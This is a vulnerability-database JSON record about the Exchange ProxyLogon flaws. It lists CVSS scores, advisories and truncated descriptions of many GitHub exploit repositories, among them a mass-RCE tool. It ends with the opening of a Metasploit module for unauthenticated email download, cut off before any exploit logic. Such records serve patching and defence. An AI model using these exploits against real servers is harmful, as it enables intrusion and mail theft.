{"githubexploit": [{"lastseen": "2022-04-03T23:52:26", "description": "# CVE-2021-26855\nCVE-2021-26855 SSRF simple exploitation\ngolang practice\n\n## Affected versions\nExc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T08:39:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-04-03T10:42:30", "id": "65D56BCD-234F-52E5-9388-7D1421B31B1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T03:31:40", "description": "# CVE-2021-26855-PoC\nPoC exploit code for CVE-2021-26855. 
\n\nOrig...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T14:27:06", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-01-10T21:06:44", "id": "14573955-860C-5947-8F2F-86347A606742", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:15:35", "description": "# proxylogscan\n\n<img src=\"https://proxylogon.com/images/logo-whi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T11:54:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T15:41:34", "id": "13C8F5B4-D05E-5953-9263-59AE11CCD7DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:19", "description": "# 106362522\nRegarding the Exchange Server vulnerabilities that Microsoft recently announced patches for after they were attacked by hackers, Taiwan's DEVCORE stated that as early as January 5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-19T09:33:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, 
"impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-04-19T09:35:18", "id": "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:19:32", "description": "# ProxyLogon\n\nProxyLogon is the formally generic name for CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T07:31:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2022-03-02T19:09:09", "id": "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:01:50", "description": "# proxylogon\n\nProof-of-concept exploit for CVE-2021-26855 and CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-24T01:12:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-27T19:34:57", "id": "D7D704DD-277E-5739-BD5E-3782370FCCB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:16", "description": "# CVE-2021-26855\nCVE-2021-26855, also known as Proxylogon, is a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T19:35:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-11-16T01:46:59", "id": "27A663CD-2720-57DA-A38A-DF1FEE0D7124", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:20:36", "description": "# Exchange SSRF toRCE Exploit\n\n\n\n**:warning:For educational and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T09:02:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", "CVE-2021-26855"], "modified": "2021-10-24T06:16:43", "id": "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-28T14:00:56", "description": "# 
ProxyLogon For Python3\nProxyLogon(CVE-2021-26855+CVE-2021-2706...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-17T03:56:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-03-28T09:27:18", "id": "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:31:55", "description": "# Exch-CVE-2021-26855\nProxyLogon is the formally generic name fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T14:23:34", "type": "githubexploit", "title": "Exploit for Vulnerability 
in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2022-02-16T09:48:52", "id": "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:26:23", "description": "# ProxyLogon-Mass-RCE\n## Description\nPython for mass deploying p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-23T17:09:30", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27065", 
"CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-05-23T17:23:03", "id": "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:20", "description": " to...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-11T20:51:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-04T16:10:52", "id": "0DE16A64-9ACA-5BBE-A315-A3AE1B013900", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-03T19:26:17", "description": "# CVE-2021-26855_PoC\nMy early SSRF payloads (CVE-2021-26855) ove...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:21:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2022-07-03T15:31:37", "id": "3019C843-FE2F-527C-B7C1-14A1C3066721", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:19:57", "description": "Disclaimer: All the information provided in this repository is f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T10:14:56", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855"], "modified": "2021-03-24T16:54:40", "id": "7275794A-F2F6-51E6-B514-185E494D8A3F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T13:06:47", "description": "# HAFNIUM-IOC\nHafnium-IOC is a simple PowerShell script that run...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T17:36:18", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26858", "CVE-2021-26857", "CVE-2021-26865"], "modified": "2022-01-12T11:59:39", "id": "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-15T15:36:14", "description": "# CVE-2021-26855_SSRF\nCVE-2021-26855 Exchange ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T07:28:21", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26857", "CVE-2021-26855", "CVE-2021-26865", "CVE-2021-26858"], "modified": "2021-12-15T14:41:36", "id": "35B21CE7-1E51-5824-B70E-36480A6E8763", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in Microsoft Exchange. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2021-26855; CVE-2021-27065)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-11T00:00:00", "id": "CPAI-2021-0099", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:35:14", "description": "A remote code execution vulnerability exists in VMware View Planner. The vulnerability is due to improper validation of HTTP request to logupload endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-14T00:00:00", "type": "checkpoint_advisories", "title": "VMware View Planner Remote Code Execution (CVE-2021-21978)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0148", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-05-21T16:03:52", "description": "", "cvss3": {}, "published": "2021-05-21T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "PACKETSTORM:162736", "href": "https://packetstormsecurity.com/files/162736/Microsoft-Exchange-ProxyLogon-Collector.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit) \n# Date: 2021-03-02 \n# Exploit Author: RAMELLA S\u00e9bastien 
\n# Vendor Homepage: https://microsoft.com \n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016 \n \n## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# begin auxiliary class \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon Collector', \n'Description' => %q{ \nThis module scans for a vulnerability on Microsoft Exchange Server that \nallows an attacker to bypass authentication and impersonate the \nadmin (CVE-2021-26855). \n \nThis bug can be chained with another post-auth arbitrary-file-write \nvulnerability to get code execution (CVE-2021-27065). \n \nAs a result, an unauthenticated attacker can execute arbitrary commands on \nMicrosoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). 